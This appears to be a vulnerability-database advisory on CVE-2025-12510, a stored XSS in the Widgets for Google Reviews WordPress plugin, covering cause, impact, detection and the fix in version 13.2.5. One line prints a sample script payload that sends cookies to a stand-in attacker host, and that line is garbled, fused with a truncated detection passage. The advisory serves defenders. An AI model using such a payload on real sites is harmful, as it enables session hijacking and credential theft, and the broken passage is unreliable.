
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-12510 is a Stored Cross-Site Scripting (XSS) vulnerability in the Widgets for Google Reviews WordPress plugin (by Trustindex), affecting all versions up to and including 13.2.4. The flaw stems from insufficient input sanitization and output escaping on Google Reviews data imported by the plugin, allowing unauthenticated attackers to inject malicious scripts via a Google Place review connected to the vulnerable site. It was published on December 6, 2025, and assigned a CVSS v3.1 base score of 7.2 (High) (Wordfence, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The plugin imports Google Reviews data from the Google Places API without adequately sanitizing reviewer-supplied content (e.g., review text) before storing or rendering it. An attacker who controls a Google account can post a malicious review containing JavaScript payloads to a Google Place linked to a vulnerable WordPress site; when the plugin imports and displays that review, the unsanitized script executes in the browser of any user (including administrators) who views the imported reviews in the admin panel or on the frontend. The vulnerable code paths are visible in the plugin source at lines 5907 and 5932 of trustindex-plugin.class.php (Wordfence, WordPress Trac).
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the context of the WordPress admin panel or the site frontend, impacting both confidentiality and integrity (CVSS scope: Changed). Consequences include session hijacking of administrator accounts, credential theft, unauthorized administrative actions (e.g., creating rogue admin users, installing malicious plugins), and potential defacement or malware injection into the frontend. The attack surface is broadened by the fact that no authentication or user interaction on the victim site is required — only the ability to post a Google review (Wordfence, ENISA EUVD).
No public exploit code or active in-the-wild exploitation has been reported as of the available data. The EPSS score is approximately 0.087% (very low probability of near-term exploitation). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the attack requires only a Google account to post a review — a very low barrier — making it accessible to a wide range of threat actors targeting WordPress sites using this plugin (Wordfence, Red Hat CVE).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent HTML-encoded variant./wp-admin/ pages with review widgets) from unexpected IP addresses shortly after a new review is imported; PHP error logs referencing trustindex-plugin.class.php around review import events.Update the Widgets for Google Reviews plugin to version 13.2.5 or later, which includes the fix for insufficient sanitization and output escaping (Wordfence, WordPress Trac Changeset). As a temporary workaround if immediate patching is not possible, consider disabling the plugin or restricting access to admin pages that render imported Google Reviews. Additionally, deploying a Web Application Firewall (WAF) with XSS filtering rules can help reduce exposure while the patch is applied.
The vulnerability was reported by Wordfence, which assigned it and published the advisory on December 6, 2025. Sucuri included it in their December 2025 vulnerability patch roundup, noting it as one of several WordPress plugin XSS issues addressed that month (Sucuri Blog). RedPacket Security and several automated CVE tracking accounts on Mastodon and Bluesky flagged the disclosure shortly after publication, reflecting routine community monitoring rather than significant alarm given the moderate exploitation barrier.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."